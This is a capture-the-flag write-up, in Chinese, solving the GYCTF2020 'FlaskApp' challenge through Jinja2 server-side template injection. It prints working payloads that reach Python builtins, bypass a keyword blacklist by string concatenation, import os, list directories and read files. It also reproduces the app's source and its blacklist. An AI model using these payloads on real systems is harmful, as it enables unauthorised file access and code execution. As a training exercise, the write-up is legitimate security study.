[GYCTF2020]FlaskApp

简单的小程序 - base64 加密

 

1、 根据题目提示：

失败乃成功之母！！

在解密界面，输入错误（比如123）时，会显示“：

binascii.Error

binascii.Error: Incorrect padding
Traceback (most recent call last)

    File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2463, in __call__

    return self.wsgi_app(environ, start_response)

    File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2449, in wsgi_app

    response = self.handle_exception(e)

    File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 1866, in handle_exception

    reraise(exc_type, exc_value, tb)

    File "/usr/local/lib/python3.7/site-packages/flask/_compat.py", line 39, in reraise

    raise value

    File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2446, in wsgi_app

    response = self.full_dispatch_request()

暴漏了文件路径： /usr/local/lib/python3.7/site-packages/flask/app.py", line 39, in reraise

2、SSTI测试

加密界面，输入{{3*3}}，得到e3szKjN9fQ==

在解密界面，输入e3szKjN9fQ==，得到no no no !!，感觉waf，黑名单

加密界面，输入{{3+3}}，得到e3szKzN9fQ==

在解密界面，输入e3szKzN9fQ==，得到6， 是SSTI模板注入

3、解题

接着读取文件app.py内容

paylaod

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

经过加密、解密得到：

结果 ： from flask import Flask,render_template_string from flask import render_template,request,flash,redirect,url_for from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import DataRequired from flask_bootstrap import Bootstrap import base64 app = Flask(__name__) app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' bootstrap = Bootstrap(app) class NameForm(FlaskForm): text = StringField('BASE64加密',validators= [DataRequired()]) submit = SubmitField('提交') class NameForm1(FlaskForm): text = StringField('BASE64解密',validators= [DataRequired()]) submit = SubmitField('提交') def waf(str): black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] for x in black_list : if x in str.lower() : return 1 @app.route('/hint',methods=['GET']) def hint(): txt = "失败乃成功之母！！" return render_template("hint.html",txt = txt) @app.route('/',methods=['POST','GET']) def encode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64encode(text.encode()) tmp = "结果 :{0}".format(str(text_decode.decode())) res = render_template_string(tmp) flash(tmp) return redirect(url_for('encode')) else : text = "" form = NameForm(text) return render_template("index.html",form = form ,method = "加密" ,img = "flask.png") @app.route('/decode',methods=['POST','GET']) def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结果 ： {0}".format(text_decode.decode()) if waf(tmp) : flash("no no no !!") return redirect(url_for('decode')) res = render_template_string(tmp) flash( res ) return redirect(url_for('decode')) else : text = "" form = NameForm1(text) return render_template("index.html",form = form, method = "解密" , img = "flask1.png") @app.route('/<name>',methods=['GET']) def not_found(name): return render_template("404.html",name = name) if __name__ == '__main__': app.run(host="0.0.0.0", port=5000, debug=True)

黑名单：

black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]

使用字符串拼接进行绕过

import = imp + ort         os =o+s

查看目录payload：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

结果 ： ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']

得到文件：this_is_the_flag.txt

读取“this_is_the_flag.txt” payload:

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

 flag{40b81e98-8c9c-49f4-9ad0-a2fdfa30a463}